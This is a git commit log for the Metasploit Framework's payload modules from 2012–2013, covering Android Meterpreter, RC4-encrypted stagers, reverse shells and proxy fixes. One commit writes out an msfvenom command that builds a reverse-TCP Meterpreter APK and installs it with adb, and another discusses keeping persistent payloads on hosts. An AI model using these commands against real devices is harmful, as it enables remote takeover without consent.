Commit Graph

492 Commits (612eabd21a249672397da51952e3031c349b2713)

Author SHA1 Message Date
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
Michael Schierl a13cf53b9f Android Meterpreter bugfixes
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
  whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00
James Lee 9c8b93f1b7 Make sure LPORT is a string when subbing
* Gets rid of conversion errors like this:
    [-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
  phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
Tod Beardsley be39079830 Trailing whitespace fix
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.

So don't sweat it.
2013-04-15 13:58:06 -05:00
Tod Beardsley efdf4e3983 Lands #1485, fixes for Windows-based Ruby targets 2013-04-15 13:56:41 -05:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
James Lee e3eef76372 Land #1223
This adds rc4-encrypting stagers for Windows.

[Closes #1223]
2013-04-10 12:14:52 -05:00
James Lee 6c980981db Break up long lines and add magic encoding comment 2013-04-10 09:28:45 -05:00
Tod Beardsley e149c8670b Unconflicting ruby_string method
Looks like the conflict was created by the msftidy fixes that happened
over on the master branch. No big deal after all.
2013-03-20 15:49:23 -05:00
jvazquez-r7 627e7f6277 avoiding grouping options 2013-03-11 18:26:03 +01:00
jvazquez-r7 f0cee29100 modified CommandDispatcher::Exploit to have the change into account 2013-03-11 18:08:46 +01:00
jvazquez-r7 c9268c3d54 original modules renamed 2013-03-11 18:04:22 +01:00
James Lee 2160718250 Fix file header comment
[See #1555]
2013-03-07 17:53:19 -06:00
RageLtMan 7f80692457 everyone will comply, resistance is futile 2013-03-06 18:38:14 -05:00
Raphael Mudge 1cc49f75f5 move flag comment to where it's used. 2013-03-03 03:26:43 -05:00
Raphael Mudge ecdb884b13 Make download_exec work with authenticated proxies
Adds INTERNET_FLAG_KEEP_CONNECTION to HttpOpenRequest flags to allow
download_exec to transparently authenticate to a proxy device through
wininet.

Fun trivia, Windows 7 systems uses Connection: keep-alive by default.
This flag benefits older targets (e.g., Windows XP).
2013-03-03 01:42:17 -05:00
Michael Schierl 4a17a30ffd Regenerate ruby modules
For shellcode changes (removed unneeded instruction) committed in
46a5c4f4bf. Saves 2 bytes per shellcode.
2013-03-03 00:14:30 +01:00
RageLtMan 3778ae09e9 This commit adds DNS resolution to rev_tcp_rc4
Due to the modular structure of payload stages its pretty trivial
to add DNS resolution instead of hard-coded IP address in stage0.

The only real complication here is that ReverseConnectRetries ends
up being one byte further down than in the original shellcode. It
appears that the original rev_tcp_dns payload suffers from the same
issue.

Hostname substitution is handled in the same method as the RC4 and
XOR keys, with an offset provided and replace_vars ignoring the
hostname.

Tested in x86 native and WOW64 on XP and 2k8r2 respectively.

This is a good option for those of us needing to leave persistent
binaries/payloads on hosts for long periods. Even if the hostname
resolves to a malicious party attempting to steal our hard earned
session, they'd be hard pressed to crypt the payload with the
appropriate RC4 pass. So long as we control the NS and records, the
hardenned shellcode should provide a better night's sleep if running
shells over the WAN. Changing the RC4 password string in the
shellcode and build.py should reduce the chances of recovery by RE.

Next step will likely be to start generating elipses for ECDH SSL
in meterpreter sessions and passing them with stage2 through the
RC4 socket. If P is 768-1024 the process is relatively quick, but
we may want to precompute a few defaults as well to have 2048+.
2013-02-28 02:59:20 -05:00
Raphael Mudge 788c96566f Allow HTTP stager to work with authenticated proxies
The HttpOpenRequest function from WinINet requires the
INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an
authenticated proxy.

From MSDN ( http://tinyurl.com/chwt86j ):

"Uses keep-alive semantics, if available, for the connection. This
 flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM),
 and other types of authentication."

Without this flag, the HTTP stager will fail when faced with a proxy
that requires authentication. The Windows HTTPS stager does not have
this problem.

For HTTP Meterpreter to communicate through an authenticated proxy a
separate patch will need to be made to the Meterpreter source code.
This is at line 1125 of source/common/core.c in the Meterpreter source
code.

My motivation for this request is for windows/dllinject/reverse_http
to download a DLL even when faced with an authenticated proxy. These
changes accomplish this.

Test environment:

I staged a SmoothWall device with the Advanced Proxy Web Add-on. I
enabled Integrated Windows Authentication with a W2K3 DC. I verified
the HTTP stager authenticated to and communicated through the proxy
by watching the proxy access.log
2013-02-24 17:33:00 -05:00
James Lee c423ad2583 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-02-21 15:30:43 -06:00
jvazquez-r7 04ec4e432d minor cleanup for shell_bind_tcp 2013-02-20 01:02:58 +01:00
jvazquez-r7 3d199fe6db Merge branch 'mipsle-shell_bind_tcp' of https://github.com/kost/metasploit-framework into kost-mipsle-shell_bind_tcp 2013-02-20 01:00:34 +01:00
sinn3r e9f4900beb Merge branch 'fixgenericcustom' of github.com:rsmudge/metasploit-framework into rsmudge-fixgenericcustom 2013-02-19 14:47:18 -06:00
Raphael Mudge 06ba2ef791 Allow generic/custom payload to generate an exe
The datastore value of ARCH has no effect on the array of
architectures the generic/custom payload is compatible with.
This commit forces the payload to update its list of compatible
architectures on generation if the ARCH value is set in the
datastore.

See:

http://dev.metasploit.com/redmine/issues/7755
2013-02-17 20:39:54 -05:00
HD Moore cae6661574 Handle invalid commands gracefully (dont exit) 2013-02-12 11:33:23 -08:00
HD Moore 4c2bddc452 Fix a typo and always treat ports as integers: 2013-02-12 08:59:11 -08:00
HD Moore a33d1ef877 This allows the ruby payloads to work properly on Windows 2013-02-12 08:55:37 -08:00
HD Moore 47f3c09616 Fix typo that snuck in during merge 2013-02-03 17:38:19 -06:00
HD Moore 5be4d41420 This is redundant/less-reliable than reverse_openssl 2013-02-03 17:35:14 -06:00
RageLtMan ffb88baf4a initial module import from SV rev_ssl branch 2013-02-03 15:06:24 -05:00
HD Moore c3801ad083 This adds an openssl CMD payload and handler 2013-02-03 04:44:25 -06:00
James Lee 92c736a6a9 Move fork stuff out of exploit into payload mixin
Tested xml against 3.2.10 and json against 3.0.19
2013-01-28 21:34:39 -06:00
Kacper Nowak f691652594 attempt to fix cmd/windows/reverse_perl payload 2013-01-23 11:21:44 +00:00
scriptjunkie 52251867d8 Ensure Windows single payloads use payload backend
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
James Lee c89b2b2ec6 Once more, with feeling 2013-01-10 15:29:54 -06:00
James Lee 7fd3440c1a Fix hd's attempt to rename ruby payloads 2013-01-10 15:25:50 -06:00
James Lee 4fcb8b6f8d Revert "Rename again to be consistent with payload naming"
This reverts commit 0fa2fcd811.
2013-01-10 15:24:25 -06:00
HD Moore 0fa2fcd811 Rename again to be consistent with payload naming 2013-01-10 14:16:37 -06:00
HD Moore 88b08087bf Renamed and made more robust 2013-01-10 14:05:29 -06:00
HD Moore e05f4ba927 Thread wrappers were causing instant session closure 2013-01-10 00:41:58 -06:00
HD Moore 4c1e501ed0 Exploit for CVE-2013-0156 and new ruby-platform modules 2013-01-09 23:10:13 -06:00
Christian Mehlmauer 8f2dd8e2ce msftidy: Remove $Revision$ 2013-01-04 00:48:10 +01:00
Christian Mehlmauer 25aaf7a676 msftidy: Remove $Id$ 2013-01-04 00:41:44 +01:00
Michael Schierl 269e507f68 Add stager modules for RC4 bind and reverse stagers
See the commit message of my last commit for caveats.
2012-12-31 22:33:30 +01:00
sinn3r 0822e8eae2 Merge branch 'kost-mipsle-shell_reverse_tcp' 2012-12-24 10:52:19 -06:00
jvazquez-r7 26f561795d fix cmd windows ruby payloads 2012-12-20 00:50:02 +01:00
sinn3r 7145078e63 Merge branch 'mipsle-shell_reverse_tcp' of git://github.com/kost/metasploit-framework into kost-mipsle-shell_reverse_tcp 2012-12-18 11:50:41 -06:00